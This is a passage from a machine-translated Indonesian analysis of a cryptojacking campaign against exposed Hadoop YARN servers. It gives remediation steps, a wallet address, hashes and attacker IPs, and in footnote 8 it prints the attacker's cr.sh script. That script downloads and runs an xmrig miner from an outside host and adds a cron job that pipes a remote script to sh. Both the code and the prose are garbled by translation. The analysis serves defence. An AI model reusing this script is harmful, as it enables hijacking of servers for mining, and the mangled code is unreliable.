Adapun IP 192.99.142.248, lihat gambar di bawah ini, yang menunjukkan apa yang telah diungkapkan hingga sekarang dalam dokumen.
Anda tidak memiliki detail yang signifikan untuk alamat IP lainnya 192.99.142.226
Saran keamanan
-
Gunakan bagian atas untuk melihat proses dan membunuh proses abnormal.
-
Periksa direktori / tmp dan / var / tmp dan hapus i fillet seperti java, ppc, ppl3, config.json dan w.conf
-
Periksa daftar kegiatan crontab dan menghilangkan anomali
-
Analisis log YARN, mengkonfirmasi aplikasi anomali, penghapusan pemrosesan.
Penguatan keamanan
-
Konfigurasikan kebijakan akses melalui iptables o grup keamanan untuk membatasi akses ke port seperti 8088;
-
jika tidak perlu, jangan buka antarmuka di jaringan publik dan modifikasi dalam panggilan lokal atau intranet;
-
perbarui Hadoop ke 2.x dan aktifkan otentikasi Kerberos untuk mencegah akses anonim.
IOC
Alamat dompet
4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
MD5
-
MD5 (xmrig_64) = c8c1f2da51fbd0aea60e11a81236c9dc
-
MD5 (xmrig_32) = 5110222de7330a371c83af67d46c4242
-
MD5 (xm64) = 183664ceb9c4d7179d5345249f1ee0c4
-
MD5 (xm32) = b00f4bbd82d2f5ec7c8152625684f853
-
MD5 (cr.sh) = 1e8c570de8acc2b7e864447c26c59b32
-
MD5 (cr.sh) = 48e79f8de26fa56d955a28c2de493132
-
MD5 (w.conf) = 777b79f6ae692d8047bcdee2c1af0fd6
-
MD5 (c.conf) = 9431791f1dfe856502dcd58f47ce5829
Alamat sesuai urutan prioritas
-
185.222.210.59 (tampaknya merupakan IP sumber);
-
46.30.43.159 (koneksi ke kolampengacau, procollo strata + tcp);
-
179.60.146.10 (koneksi ke kolampengacau, procollo strata + tcp);
-
95.142.40.83 (file unduh dari data mining);
-
95.142.40.81 (file unduh dari data mining);
-
46.30.42.162 (file unduh dari data mining);
-
192.99.142.248 (koneksi ke aktivitas penghindaran);
-
192.99.142.232 (koneksi ke aktivitas penghindaran);
-
192.99.142.226 (koneksi ke aktivitas penghindaran);
-
85.214.102.143 (sidik jari umum dengan alamat di atas);
-
85.214.125.15 (sidik jari umum dengan alamat di atas);
-
85.214.60.153 (sidik jari umum dengan alamat yang disebutkan di atas).
Alamat yang diduga milik ketersediaanpengacau
|
185.154.52.117 (vz230686.eurodir.ru) |
|
185.154.52.161 (piar60.ru) |
|
185.154.52.181 (vz224405.eurodir.ru) |
|
185.154.52.236 (supportt.ru) |
|
185.154.53.108 (vz224405.eurodir.ru) |
|
185.154.53.137 (vz224405.eurodir.ru) |
|
185.154.53.190 (vz228963.eurodir.ru) |
|
185.154.53.249 (vz232259.eurodir.ru) |
|
185.154.53.46 (server.badstudio.ru) |
|
185.154.53.65 (profshinservice.ru) |
|
185.154.53.67 (vz232259.eurodir.ru) |
|
185.154.53.72 (vz231895.eurodir.ru) |
|
46.30.41.182 (vz230501.eurodir.ru) |
|
46.30.41.207 (vz230806.eurodir.ru) |
|
46.30.41.51 (vz225213.eurodir.ru) |
|
46.30.41.80 (track.dev) |
|
46.30.42.162 (server.com) |
|
46.30.43.128 (vz228757.eurodir.ru) |
|
46.30.45.152 (vz230274.eurodir.ru) |
|
46.30.45.30 (shop.engine) |
|
46.30.45.91 (vz220153.eurodir.ru) |
|
46.30.47.115 (vz227413.eurodir.ru) |
|
46.30.47.157 (vz228859.eurodir.ru) |
|
95.142.39.109 (vz228627.eurodir.ru) |
|
95.142.39.151 (donotopen.ru) |
|
95.142.39.164 (vz232259.eurodir.ru) |
|
95.142.39.172 (hosted-by.wikhost.com) |
|
95.142.39.241 (shimshim.info) |
|
95.142.39.251 (vz232259.eurodir.ru) |
|
95.142.40.188 (vz232259.eurodir.ru) |
|
95.142.40.189 (vz232259.eurodir.ru) |
|
95.142.40.190 (vz232259.eurodir.ru) |
|
95.142.40.44 (vz229990.eurodir.ru) |
|
95.142.40.74 (vz232259.eurodir.ru) |
|
95.142.40.81 (vz228855.eurodir.ru) |
|
95.142.40.82 (vz228856.eurodir.ru) |
|
95.142.40.83 (vz228857.eurodir.ru) |
|
95.142.40.86 (kolos1952.ru) |
|
95.142.40.87 (regiister.ru) |
|
95.142.40.88 (buled.ru) |
|
95.142.40.89 (vz229526.eurodir.ru) |
|
95.142.39.233 (vz231616.eurodir.ru) |
|
185.154.53.46 (server.badstudio.ru) |
|
46.30.47.107 (vz227413.eurodir.ru) |
|
46.30.47.21 (vz227411.eurodir.ru) |
|
46.30.47.35 (vz227411.eurodir.ru) |
|
46.30.47.66 (vz227407.eurodir.ru) |
|
46.30.47.82 (vz227413.eurodir.ru) |
|
95.142.39.102 (vz222177.eurodir.ru) |
Kesimpulan
Bagi mereka yang telah tiba sampai akhir, adalah tepat untuk menyimpulkan, menggarisbawahi bagaimana sistem operasi telah digunakan standar seperti Ubuntu dan Windows 7.
Seluruh proses juga telah direplikasi pada Sistem Operasi seperti yang disebutkan di atas dengan hasil positif dan bisa juga diasumsikan bahwa perangkat IoT.
Saya pikir ini sangat rumit untuk mengganggu atau bahkan melihat ancaman yang sama jika itu ditujukan kepada IoT, kurangnya pengetahuan tentang sistem dasar, kurangnya keamanan, tetapi di atas semua sistem keamanan yang langka yang dapat kita gunakan untuk mengelola penggunaan IOT. sehari-hari.
Sayangnya saya belum melakukan tes apa pun pada IOT, jadi saya tidak bisa mengatakan dengan pasti fungsi yang tepat dari keseluruhan proses yang dijelaskan.
Saya ingin menyimpulkan dengan provokasi, menggarisbawahi aspek lain mengenai penggunaan cryptominer. Bahkan itu tidak dapat dikecualikan bahwa Cyber Crime menggunakan i cryptominer untuk mensubsidi kampanye malware jauh lebih canggih seperti yang melekat pada APT12 juga asal-usul parastatal, mempertimbangkan kemungkinan pembiayaan sendiri dengan persetujuan pemerintah di mana kelompok "hacker" bekerja atau dengan siapa mereka berkolaborasi. Faktor yang terkait dengan anonimitas penuh dari Operasi di domain Cyber, memungkinkan, margin tinggi penipuan, membuat kegiatan semacam itu sangat menguntungkan dari sudut pandang Intelijen, melalui kemampuan mengelola dengan mudah Operasi Bendera Salah dan dari "alamat"Atribusi ke pihak ketiga yang tidak terkait dengan mereka.
Akhirnya, pertimbangan terakhir pada kesulitan yang terkait dengan pelaksanaan analisis ini. Kesulitan yang mungkin ditemukan pembaca dalam membaca analisis adalah cermin dari kesulitan dalam mengeksekusinya, tetapi jika Anda ingin bermain dengan peran non-marjinal di papan catur maya, penting untuk menyiapkan dan menyadarkan orang, mampu menganalisis dan mengimplementasikan solusi yang diperlukan pada sistem nyata, umumnya jauh lebih kompleks daripada yang saya buat untuk tujuan pendidikan.
1 HDFS: HDFS mengacu pada Sistem File Terdistribusi Hadoop. Ini adalah Sistem File yang dibuat dengan teknologi Open Source baru yang mendukung sistem hierarki dari file dan direktori yang didistribusikan pada node penyimpanan yang dikelola oleh Hadoop. Untuk mempelajari lebih lanjut: https: // www. zerounoweb.it/techtarget/searchdatacenter/hadoop-significa-rendere-piu-economico-il-big-data-management-ecco-come/
2 REST API: Antarmuka Pemrograman Aplikasi Transfer Negara Representasional. Secara keseluruhan ini adalah indikasi dari pengembang kode yang berguna untuk menentukan bagaimana data yang digunakan oleh aplikasi harus ditransmisikan.
3 Secara umum ini disebut pot madu ketika mengacu pada sesuatu yang dibuat khusus untuk menarik penyerang, dalam prakteknya adalah jebakan yang dibuat untuk memastikan bahwa seorang penyerang terungkap.
4 Istilah penambangan umumnya mengacu pada pelaksanaan perhitungan untuk menciptakan cryptocurrency melalui pelaksanaan perhitungan yang rumit.
5 Perayap adalah perangkat lunak yang secara otomatis memindai jaringan untuk kerentanan.
6 Skrip tidak lebih dari sebuah file yang berisi urutan perintah.
7 Secara khusus, Anda dapat dengan jelas melihat cara mengunduh dan menjalankan skrip yang disebut cr.sh dari alamat IP 185.222.210.59 dan Anda menggunakan perintah singkirkanyaitu, proses dilakukan dalam contoh menampar arus terminal, di latar belakang, tetapi prosesnya terpisah dari daftar pekerjaan di menampar (Yaitu proses tidak terdaftar sebagai pekerjaan bash di latar depan /latar belakang); oleh karena itu digunakan untuk menghapus / menghapus pekerjaan atau memberi tahu shell untuk tidak mengirim sinyal HUP menggunakan perintah disclaimer.
8 pkill -f cryptonight
pkill -f mendukung
pkill -f xmrig
pkill -f xmr-stak
pkill -f suppoie
#ps ax | grep / tmp / yarn | grep -v grep | xargs kill -9
Bagian dari kode ini terutama menyangkut proses data pertambangan yang ada, dokumen yang harus dibersihkan, proses yang harus diselesaikan, namun, kami segera memiliki petunjuk penting, cryptonight (kita akan lihat nanti).
WGET = "wget -O"
jika [-s / usr / bin / curl];
kemudian
WGET = "curl -o";
fi
jika [-s / usr / bin / wget];
kemudian
WGET = "wget -O";
fi
f2 = "185.222.210.59"
Bagian kedua ini, periksa dan tetapkan beberapa variabel, tentukan apakah perintah sudah ada keriting e wget dan jika demikian, menetapkan mereka ke variabel WGET, f2 memberikan nilai IP.
Bahkan, f2 adalah salah satunya Server digunakan untuk mengunduh file yang terkait dengan aktivitas berbahaya yang sedang berlangsung.
downloadIfNeed ()
{
jika [! -f / tmp / java]; kemudian
echo "File tidak ditemukan!"
Download
fi
jika [-x "$ (perintah -v md5sum)"]
kemudian
sum = $ (md5sum / tmp / java | awk '{cetak $ 1}')
echo $ sum
$ jumlah rumah di
c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242)
echo "Java OK"
;;
*)
echo "Java salah"
sizeBefore = $ (du / tmp / java)
jika [-s / usr / bin / curl];
kemudian
WGET = "curl -k -o";
fi
jika [-s / usr / bin / wget];
kemudian
WGET = "wget --no-periksa-sertifikat -O";
fi
$ WGET / tmp / java https: // transfer.sh/ixQBE/zzz
sumAfter = $ (md5sum / tmp / java | awk '{cetak $ 1}')
jika [-s / usr / bin / curl];
kemudian
echo "mengunduh ulang $ sum $ sizeBefore setelah $ sumAfter" `du / tmp / java`> /tmp/tmp.txt
curl -F "file = @ /tmp/tmp.txt" http: //$f2/re.php
fi
;;
esac
lain
echo "No md5sum"
Download
fi
}
unduh () {
f1 = $ (curl 185.222.210.59 / g.php)
jika [-z "$ f1"];
kemudian
f1 = $ (wget -q -O - 185.222.210.59 / g.php)
fi
jika [`getconf LONG_BIT` =" 64 "]
kemudian
$ WGET / tmp / java http: // $ f1 / xmrig_64
lain
$ WGET / tmp / java http: // $ f1 / xmrig_32
fi
}
jika [! "$ (ps -fe | grep '/ tmp / java -c / tmp/w.conf' | grep -v grep)"];
kemudian
downloadIfNeed
chmod + x / tmp / java
$ WGET /tmp/w.conf http: //$f2/w.conf
nohup / tmp / java -c /tmp/w.conf> / dev / null 2> & 1 &
tidur 5
rm -rf /tmp/w.conf
lain
echo "Running"
fi
jika crontab-l | grep -q "185.222.210.59"
kemudian
gema "Cron ada"
lain
echo "Cron not found"
LDR = "wget -q -O -"
jika [-s / usr / bin / curl];
kemudian
LDR = "curl";
fi
jika [-s / usr / bin / wget];
kemudian
LDR = "wget -q -O -";
fi
(crontab -l 2> / dev / null; echo "* / 2 * * * * $ LDR http: // 185.222.210.59/cr.sh | sh> / dev / null 2> & 1") | crontab -
fi
Bagian ketiga ini dari kode terutama menentukan apakah / tmp / java adalah file yang ada dan dapat ditulis, dan kemudian menentukan apakah nilai MD5 sesuai dengan salah satu nilai MD5 hadir dalam kode (kita akan lihat nanti keanggotaan dua hash fillet). di naskah, variabel LDR ditetapkan. Variabel ini terutama digunakan untuk mengunduh direktori untuk menyimpan program pertambangan dan jenis lainnya, menggunakan perintah wget atau curl, tergantung apakah ada perintah di sistem host. Bagian kode ini adalah inti dari kode, unduh jika perlu (dengan metode downloadIfNeed) dan ekstrak, di direktori / tmp ganti nama di java yang dapat dieksekusi untuk data pertambangan (memeriksa terima kasih kepada getconf LONG_BIT jika executable harus dalam 32 atau 64 bit), unduh file konfigurasi w.conf, tambahkan izin eksekusi ke program pertambangan dan kemudian menjalankan perintah nohup latar belakang pertambangan (nohup Ini adalah perintah yang tidak mengabaikan sinyal SIGHUP, sehingga memungkinkan eksekusi untuk melanjutkan bahkan dalam hal pemutusan dari terminal, atau penutupan terminal emulator).
Program dan hapus file konfigurasi, kemudian periksa tugas di crontab, jika tidak ada tugas yang cocok, itu akan mengunduh tugas untuk menjalankan skrip "* / 2 * * * * $ LDR http: // 185.222.210.59/cr .sh | sh> / dev / null 2> & 1 "ditambahkan ke dalamnya, di mana $ LDR adalah wget -q -O - atau curl (juga disebutkan di atas), tugas berjalan setiap dua menit sekali (seperti yang ditunjukkan pada gambar, menunjukkan opsi bidang yang menentukan frekuensi eksekusi perintah).
Lo naskah berisi metode pengunduhan untuk beberapa panggilan bertingkat. Metode inputnya adalah unduhIfNeed. Dengan menetapkan lebih baik, fungsi utama dari metode ini adalah untuk memeriksa MD5 dari program tanggal pertambangan ada, jika tidak dapat diverifikasi atau file tidak ada, langsung panggil metode unduh (sesuai dengan metode yang ditemukan di naskah) untuk mengunduh program pertambangan Jika file ada tetapi MD5 tidak cocok dengan benar, panggil metode download. Setelah memeriksa lagi, jika verifikasi gagal, coba unduh program penambangan dari saluran unduhan lain https: // transfer.sh/WoGXx/zzz dan verifikasi lagi. Akhirnya, hasil yang relevan dilaporkan ke server target re.php $ f2.
Jika ada, nama replikasi adalah java.
Metode unduhan () menilai bahwa sistem mengunduh versi yang sesuai dari program pertambangan dari sumber web berikut: http: // 185.222.210.59/g.php.
Sumber daya mengembalikan alamat IP lain untuk mengunduh executable utama, setelah unduhan selesai, itu diperiksa lagi dan salinannya diganti menjadi ppc.
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
crontab-l | sed '/ logo4 / d' | crontab -
crontab-l | sed '/ logo9 / d' | crontab -
crontab-l | sed '/ logo0 / d' | crontab -
Di bagian terakhir skrip ada beberapa proses, file, proses pembersihan crontab, penggunaan pkill untuk mengakhiri proses yang memenuhi kondisi dan menghilangkan beberapa aktivitas crontab.
9 Informasi Open Source
10 https:// community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-an.html oppure https:// stackoverflow.com/questions/50520658/its-seem-that-the-yarn-is-infected-by-trojan-even-if-i-reinstall-my-computer
11 Remote Procedure Call, adalah mekanisme umum untuk mengelola aplikasi client-server.
12 Rintangan Lanjutan dan Persisten, jenis serangan yang umumnya dilakukan oleh organisasi berbasis negara.
(foto: US DoD)
